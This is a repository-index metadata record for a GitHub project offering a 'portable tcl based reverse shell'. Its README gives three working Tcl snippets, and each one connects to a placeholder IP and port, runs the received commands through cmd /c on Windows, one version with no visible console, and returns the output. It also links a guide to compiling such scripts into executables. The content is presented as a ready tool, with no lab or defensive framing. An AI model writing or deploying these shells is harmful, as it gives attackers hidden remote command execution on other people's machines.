{"id":19552919,"url":"https://github.com/potato-industries/trs","last_synced_at":"2026-03-02T08:02:44.358Z","repository":{"id":216841414,"uuid":"435998284","full_name":"Potato-Industries/trs","owner":"Potato-Industries","description":"portable tcl based reverse shell","archived":false,"fork":false,"pushed_at":"2024-01-12T15:57:52.000Z","size":3,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-11-20T08:02:51.825Z","etag":null,"topics":["reverse-shell","security","tcl"],"latest_commit_sha":null,"homepage":"","language":"Tcl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Potato-Industries.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-07T19:12:14.000Z","updated_at":"2024-01-12T15:54:41.000Z","dependencies_parsed_at":null,"dependency_job_id":"93eb9586-ccd1-44f9-81e8-99d46516a21e","html_url":"https://github.com/Potato-Industries/trs","commit_stats":null,"previous_names":["potato-industries/trs"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Potato-Industries/trs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Ftrs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Ftrs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Ftrs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Ftrs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Potato-Industries","download_url":"https://codeload.github.com/Potato-Industries/trs/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Ftrs/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29995910,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-02T01:47:34.672Z","status":"online","status_checked_at":"2026-03-02T02:00:07.342Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["reverse-shell","security","tcl"],"created_at":"2024-11-11T04:20:08.799Z","updated_at":"2026-03-02T08:02:42.043Z","avatar_url":"https://github.com/Potato-Industries.png","language":"Tcl","funding_links":[],"categories":[],"sub_categories":[],"readme":"# trs\nportable tcl based reverse shell\n\nhttps://www.tcl.tk/about/language.html\n\n**Compile**\n\nhttps://wiki.tcl-lang.org/page/How+to+compile+a+TCL+script+into+an+EXE+program\n\n\n\n```\nset chan [socket IP PORT]\nwhile {1} {                        \n   flush $chan                             \n   puts $chan [exec cmd /c [gets $chan]] \n   flush $chan\n}\n```\n\n```\nset chan [socket IP PORT]\nwhile {1} {                        \n   flush $chan                               \n   set fd [open \"|cmd /c [gets $chan]\" r]\n   while {[gets $fd line] \u003e= 0} { puts $chan $line }\n   flush $chan\n}\n```\n\n```\npackage require twapi\nproc runrun {in} {\n   set args \"/c $in\"  \n   return \n[twapi::shell_execute -path cmd.exe -noconsole 1 -params $args]\n \n}\nset chan [socket IP PORT]\nwhile {1} {                        \n   flush $chan                             \n   puts $chan [runrun [gets $chan]]\n   flush $chan\n}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpotato-industries%2Ftrs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpotato-industries%2Ftrs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpotato-industries%2Ftrs/lists"}